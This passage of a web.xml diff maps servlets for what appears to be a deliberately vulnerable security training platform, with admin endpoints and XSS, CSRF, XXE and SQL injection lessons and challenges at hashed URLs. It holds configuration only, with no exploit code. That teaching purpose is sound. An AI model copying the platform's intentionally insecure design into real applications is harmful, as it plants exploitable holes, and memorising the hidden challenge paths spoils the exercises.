+		<servlet-name>/createNewClass</servlet-name>
+		<servlet-class>servlets.admin.userManagement.CreateClass</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/createNewClass</servlet-name>
+		<url-pattern>/createNewClass</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/addPlayer</servlet-name>
+		<servlet-class>servlets.admin.userManagement.AddPlayer</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/addPlayer</servlet-name>
+		<url-pattern>/addPlayer</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/deletePlayers</servlet-name>
+		<servlet-class>servlets.admin.userManagement.DeletePlayers</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/deletePlayers</servlet-name>
+		<url-pattern>/deletePlayers</url-pattern>
+	</servlet-mapping>
+
+
+	<servlet>
+		<servlet-name>/assignPlayers</servlet-name>
+		<servlet-class>servlets.admin.userManagement.AssignPlayers</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/assignPlayers</servlet-name>
+		<url-pattern>/assignPlayers</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/setDefaultRegistrationClass</servlet-name>
+		<servlet-class>servlets.admin.userManagement.SetDefaultClass</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/setDefaultRegistrationClass</servlet-name>
+		<url-pattern>/setDefaultRegistrationClass</url-pattern>
+	</servlet-mapping>
+
+
+	<servlet>
+		<servlet-name>/getPlayersByClass</servlet-name>
+		<servlet-class>servlets.admin.userManagement.GetPlayersByClass</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/getPlayersByClass</servlet-name>
+		<url-pattern>/getPlayersByClass</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/suspendPlayer</servlet-name>
+		<servlet-class>servlets.admin.userManagement.SuspendUser</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/suspendPlayer</servlet-name>
+		<url-pattern>/suspendPlayer</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/unSuspendPlayer</servlet-name>
+		<servlet-class>servlets.admin.userManagement.UnSuspendUser</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/unSuspendPlayer</servlet-name>
+		<url-pattern>/unSuspendPlayer</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/giveTakePoints</servlet-name>
+		<servlet-class>servlets.admin.userManagement.GiveTakePoints</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/giveTakePoints</servlet-name>
+		<url-pattern>/giveTakePoints</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/upgradePlayer</servlet-name>
+		<servlet-class>servlets.admin.userManagement.UpgradePlayer</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/upgradePlayer</servlet-name>
+		<url-pattern>/upgradePlayer</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/downgradeAdmin</servlet-name>
+		<servlet-class>servlets.admin.userManagement.DowngradeAdmin</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/downgradeAdmin</servlet-name>
+		<url-pattern>/downgradeAdmin</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/updateRegistration</servlet-name>
+		<servlet-class>servlets.admin.config.ToggleRegistration</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/updateRegistration</servlet-name>
+		<url-pattern>/updateRegistration</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/changeUserPassword</servlet-name>
+		<servlet-class>servlets.admin.userManagement.ChangeUserPassword</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/changeUserPassword</servlet-name>
+		<url-pattern>/changeUserPassword</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/getProgress</servlet-name>
+		<servlet-class>servlets.admin.moduleManagement.GetProgress</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/getProgress</servlet-name>
+		<url-pattern>/getProgress</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/openEveryModules</servlet-name>
+		<servlet-class>servlets.admin.moduleManagement.OpenAllModules</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/openEveryModules</servlet-name>
+		<url-pattern>/openEveryModules</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/tournamentModeModules</servlet-name>
+		<servlet-class>servlets.admin.config.SetTournamentMode</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/tournamentModeModules</servlet-name>
+		<url-pattern>/tournamentModeModules</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/closeEveryModules</servlet-name>
+		<servlet-class>servlets.admin.moduleManagement.CloseAllModules</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/closeEveryModules</servlet-name>
+		<url-pattern>/closeEveryModules</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/openWebModules</servlet-name>
+		<servlet-class>servlets.admin.moduleManagement.OpenWebModules</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/openWebModules</servlet-name>
+		<url-pattern>/openWebModules</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/openMobileModules</servlet-name>
+		<servlet-class>servlets.admin.moduleManagement.OpenMobileModules</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/openMobileModules</servlet-name>
+		<url-pattern>/openMobileModules</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/enableModuleBlock</servlet-name>
+		<servlet-class>servlets.admin.moduleManagement.EnableModuleBlock</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/enableModuleBlock</servlet-name>
+		<url-pattern>/enableModuleBlock</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/removeModuleLock</servlet-name>
+		<servlet-class>servlets.admin.moduleManagement.RemoveModuleLock</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/removeModuleLock</servlet-name>
+		<url-pattern>/removeModuleLock</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/getJsonProgress</servlet-name>
+		<servlet-class>servlets.admin.moduleManagement.GetJsonProgress</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/getJsonProgress</servlet-name>
+		<url-pattern>/getJsonProgress</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/EnableScoreboard</servlet-name>
+		<servlet-class>servlets.admin.config.EnableScoreboard</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/EnableScoreboard</servlet-name>
+		<url-pattern>/EnableScoreboard</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/DisableScoreboard</servlet-name>
+		<servlet-class>servlets.admin.config.DisableScoreboard</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/DisableScoreboard</servlet-name>
+		<url-pattern>/DisableScoreboard</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/scoreboard</servlet-name>
+		<servlet-class>servlets.GetJsonScore</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/scoreboard</servlet-name>
+		<url-pattern>/scoreboard</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/enableCheats</servlet-name>
+		<servlet-class>servlets.admin.config.EnableCheats</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/enableCheats</servlet-name>
+		<url-pattern>/enableCheats</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/disableCheats</servlet-name>
+		<servlet-class>servlets.admin.config.DisableCheats</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/disableCheats</servlet-name>
+		<url-pattern>/disableCheats</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/getCheat</servlet-name>
+		<servlet-class>servlets.module.GetCheat</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/getCheat</servlet-name>
+		<url-pattern>/getCheat</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/getModule</servlet-name>
+		<servlet-class>servlets.module.GetModule</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/getModule</servlet-name>
+		<url-pattern>/getModule</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/solutionSubmit</servlet-name>
+		<servlet-class>servlets.module.SolutionSubmit</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/solutionSubmit</servlet-name>
+		<url-pattern>/solutionSubmit</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/feedbackSubmit</servlet-name>
+		<servlet-class>servlets.module.FeedbackSubmit</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/feedbackSubmit</servlet-name>
+		<url-pattern>/feedbackSubmit</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/openFloorModules</servlet-name>
+		<servlet-class>servlets.admin.config.SetOpenFloorMode</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/openFloorModules</servlet-name>
+		<url-pattern>/openFloorModules</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/setCtfMode</servlet-name>
+		<servlet-class>servlets.admin.config.SetCtfMode</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/setCtfMode</servlet-name>
+		<url-pattern>/setCtfMode</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/getFeedback</servlet-name>
+		<servlet-class>servlets.admin.moduleManagement.GetFeedback</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/getFeedback</servlet-name>
+		<url-pattern>/getFeedback</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/setModuleStatus</servlet-name>
+		<servlet-class>servlets.admin.moduleManagement.SetModuleStatus</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/setModuleStatus</servlet-name>
+		<url-pattern>/setModuleStatus</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/openCloseModuleCategories</servlet-name>
+		<servlet-class>servlets.admin.moduleManagement.OpenOrCloseByCategory</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/openCloseModuleCategories</servlet-name>
+		<url-pattern>/openCloseModuleCategories</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/changeHostAddress</servlet-name>
+		<servlet-class>servlets.admin.config.ChangeHostAddress</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/changeHostAddress</servlet-name>
+		<url-pattern>/changeHostAddress</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/changeVulnerableAppRoot</servlet-name>
+		<servlet-class>servlets.admin.config.ChangeVulnerableAppRoot</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/changeVulnerableAppRoot</servlet-name>
+		<url-pattern>/changeVulnerableAppRoot</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/lessons/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a</servlet-name>
+		<servlet-class>servlets.module.lesson.XxeLesson</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/lessons/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a</servlet-name>
+		<url-pattern>/lessons/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a</servlet-name>
+		<servlet-class>servlets.module.lesson.XssLesson</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a</servlet-name>
+		<url-pattern>/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa</servlet-name>
+		<servlet-class>servlets.module.challenge.XssChallengeOne</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa</servlet-name>
+		<url-pattern>/challenges/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888</servlet-name>
+		<servlet-class>servlets.module.challenge.XssChallengeTwo</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888</servlet-name>
+		<url-pattern>/challenges/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e</servlet-name>
+		<servlet-class>servlets.module.challenge.XssChallengeThree</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e</servlet-name>
+		<url-pattern>/challenges/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7</servlet-name>
+		<servlet-class>servlets.module.lesson.CsrfLesson</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7</servlet-name>
+		<url-pattern>/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/root/grantComplete/csrfLesson</servlet-name>
+		<servlet-class>servlets.module.lesson.CsrfLessonTarget</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/root/grantComplete/csrfLesson</servlet-name>
+		<url-pattern>/root/grantComplete/csrfLesson</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/user/csrfchallengeone/plusplus</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeTargetOne</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/user/csrfchallengeone/plusplus</servlet-name>
+		<url-pattern>/user/csrfchallengeone/plusplus</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/user/csrfchallengetwo/plusplus</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeTargetTwo</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/user/csrfchallengetwo/plusplus</servlet-name>
+		<url-pattern>/user/csrfchallengetwo/plusplus</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/user/csrfchallengejson/plusplus</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeTargetJSON</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/user/csrfchallengejson/plusplus</servlet-name>
+		<url-pattern>/user/csrfchallengejson/plusplus</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/user/csrfchallengethree/plusplus</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeTargetThree</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/user/csrfchallengethree/plusplus</servlet-name>
+		<url-pattern>/user/csrfchallengethree/plusplus</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/s74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeOne</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/s74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52</servlet-name>
+		<url-pattern>/challenges/s74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeTwo</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e</servlet-name>
+		<url-pattern>/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeJSON</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb</servlet-name>
+		<url-pattern>/challenges/2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeThree</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c</servlet-name>
+		<url-pattern>/challenges/z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f</servlet-name>
+		<servlet-class>servlets.module.lesson.UnvalidatedForwardsLesson</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f</servlet-name>
+		<url-pattern>/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/root/grantcomplete/unvalidatedredirectlesson</servlet-name>
+		<servlet-class>servlets.module.lesson.RedirectLessonTarget</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/root/grantcomplete/unvalidatedredirectlesson</servlet-name>
+		<url-pattern>/root/grantcomplete/unvalidatedredirectlesson</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/user/redirect</servlet-name>
+		<servlet-class>servlets.module.lesson.Redirect</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/user/redirect</servlet-name>
+		<url-pattern>/user/redirect</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/changeCoreHostAddress</servlet-name>
+		<servlet-class>servlets.admin.config.ChangeCoreHostAddress</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/changeCoreHostAddress</servlet-name>
+		<url-pattern>/changeCoreHostAddress</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/changeCoreDatabase</servlet-name>
+		<servlet-class>servlets.admin.config.ChangeCoreDatabase</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/changeCoreDatabase</servlet-name>
+		<url-pattern>/changeCoreDatabase</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/changeExposedDatabase</servlet-name>
+		<servlet-class>servlets.admin.config.ChangeExposedDatabase</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/changeExposedDatabase</servlet-name>
+		<url-pattern>/changeExposedDatabase</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/enableFeedback</servlet-name>
+		<servlet-class>servlets.admin.config.EnableFeedback</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/enableFeedback</servlet-name>
+		<url-pattern>/enableFeedback</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/disableFeedback</servlet-name>
+		<servlet-class>servlets.admin.config.DisableFeedback</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/disableFeedback</servlet-name>
+		<url-pattern>/disableFeedback</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/cancelConfigPrompt</servlet-name>
+		<servlet-class>servlets.admin.config.NoMoreQuickConfig</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/cancelConfigPrompt</servlet-name>
+		<url-pattern>/cancelConfigPrompt</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751</servlet-name>
+		<servlet-class>servlets.module.challenge.XssChallengeFour</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751</servlet-name>
+		<url-pattern>/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671</servlet-name>
+		<servlet-class>servlets.module.challenge.XssChallengeFive</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671</servlet-name>
+		<url-pattern>/challenges/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeFive</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49</servlet-name>
+		<url-pattern>/challenges/70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/user/csrfchallengefive/plusplus</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeTargetFive</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/user/csrfchallengefive/plusplus</servlet-name>
+		<url-pattern>/user/csrfchallengefive/plusplus</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeSix</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569</servlet-name>
+		<url-pattern>/challenges/2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/user/csrfchallengesix/plusplus</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeTargetSix</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/user/csrfchallengesix/plusplus</servlet-name>
+		<url-pattern>/user/csrfchallengesix/plusplus</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeSeven</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3</servlet-name>
+		<url-pattern>/challenges/7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/user/csrfchallengeseven/plusplus</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeTargetSeven</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/user/csrfchallengeseven/plusplus</servlet-name>
+		<url-pattern>/user/csrfchallengeseven/plusplus</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeFour</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5</servlet-name>
+		<url-pattern>/challenges/84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/user/csrfchallengefour/plusplus</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeTargetFour</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/user/csrfchallengefour/plusplus</servlet-name>
+		<url-pattern>/user/csrfchallengefour/plusplus</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/user/csrfchallengeseven/getToken</servlet-name>
+		<servlet-class>servlets.module.challenge.CsrfChallengeSevenGetToken</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/user/csrfchallengeseven/getToken</servlet-name>
+		<url-pattern>/user/csrfchallengeseven/getToken</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf</servlet-name>
+		<servlet-class>servlets.module.challenge.XssChallengeSix</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf</servlet-name>
+		<url-pattern>/challenges/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf</url-pattern>
+	</servlet-mapping>
+
+
+	<servlet>
+		<servlet-name>/lessons/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594</servlet-name>
+		<servlet-class>servlets.module.lesson.SqlInjectionLesson</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/lessons/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594</servlet-name>
+		<url-pattern>/lessons/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/lessons/a59bf026c49b603759662b5cfe70b8d292e68650cc3cb5c2fc964e8ea2ce9aca</servlet-name>
+		<servlet-class>servlets.a59bf026c49b603759662b5cfe70b8d292e68650cc3cb5c2fc964e8ea2ce9aca</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/lessons/a59bf026c49b603759662b5cfe70b8d292e68650cc3cb5c2fc964e8ea2ce9aca</servlet-name>
+		<url-pattern>/lessons/a59bf026c49b603759662b5cfe70b8d292e68650cc3cb5c2fc964e8ea2ce9aca</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b</servlet-name>
+		<servlet-class>servlets.module.challenge.SqlInjectionEmail</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b</servlet-name>
+		<url-pattern>/challenges/ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a</servlet-name>
+		<servlet-class>servlets.module.challenge.SqlInjection1</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a</servlet-name>
+		<url-pattern>/challenges/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a</url-pattern>
+	</servlet-mapping>
+
+	<servlet>
+		<servlet-name>/challenges/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6</servlet-name>
+		<servlet-class>servlets.module.challenge.SqlInjection3</servlet-class>
+	</servlet>
+	<servlet-mapping>
+		<servlet-name>/challenges/b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6</servlet-name>
